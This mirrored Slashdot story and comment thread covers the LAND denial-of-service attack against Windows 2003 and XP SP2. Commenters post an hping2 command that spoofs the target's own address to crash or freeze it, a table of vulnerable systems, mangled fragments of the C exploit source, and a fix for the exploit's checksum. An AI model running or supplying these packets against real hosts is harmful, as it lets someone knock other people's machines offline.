Slashdot Mirror
Windows 2003 and XP SP2 Vulnerable To LAND Attack
An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
There is a big list before the provided source code.
So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
The LAND attack requires an open port, so by definition if the system isn't running any services it will have no open ports and not be vulnerable to this attack.
Grab a copy of hping2 and try:
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
Yep, I never spell check.
More incorrect spellings can be found he
BSDI 2.1 (vanilla) IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE IS vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable
FreeBSD 3.0-CURRENT IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 6.2 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
NetBSD 1.2 IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEp 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Solaris 2.5.1 IS vulnerable (conflicting reports)
SunOS 4.1.4 IS vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Trolling using another account since 2005.
Security through obsecurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).
z eof(struct iphdr)/4;t tl=255;d dr=sin.sin_addr.s_addr;a ddr.s_addr;
h _dport=sin.sin_port;1 C);f f=sizeof(struct tcphdr)/4;
. s_addr;_ addr;g th=htons(sizeof(struct tcphdr));
---snip---
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=si
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->
ipheader->protocol=IP_TCP;
ipheader->sa
ipheader->daddr=sin.sin_
tcpheader->th_sport=sin.sin_port;
tcpheader->t
tcpheader->th_seq=htonl(0xF
tcpheader->th_flags=TH_SYN;
tcpheader->th_o
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr
pseudoheader.daddr.s_addr=sin.sin_addr.s
pseudoheader.protocol=6;
pseudoheader.len
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
---snip---
http://support.microsoft.com/default.aspx?scid=kb; en-us;165005
In Soviet Russia, Trojan exploits YOU!
The problem might be w/ your code.
A test listed in an above comment of mine worked for my box. DL hping2 and try:
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
Yep, I never spell check.
More incorrect spellings can be found he
Yeah, that's the Simple File Sharing "feature" of XP Home Edition. Enabled by default, it can be annoying if you're used to doing things the "old way" (user friendly, but expert hostile). Just use this KB article to turn it off.
Entrepreneur : (noun), French for "unemployed"
Unfortuntately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?
Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.
At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...
Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.
In the end they will lay their freedom at our feet and say to us, Make us your slaves, but feed us. - Fyodor Dostoyevsky
I found some interesting things while playing around with this.
1st: The checksum code is always off by 3 in that file. Subtract 3 from the value before you take the complement and it'll be right. (this is a kludge, I haven't taken the time to actually figure out why it's wrong yet)
2nd: It causes 100% CPU usage on a WinXP SP2 box for about 3 seconds for each packet sent!!!
3rd: It can be blocked (and probably IS blocked) by most routers since the source and destination addresses are the same.
I got permission to send one of these packets to my friends Win2003 box and as far as we can tell, it didn't do anything. I don't know if the packet is getting through though.
4th: Also, I retested the Mac, and again, the malformed packet did nothing.
Don't count your messages before they ACK.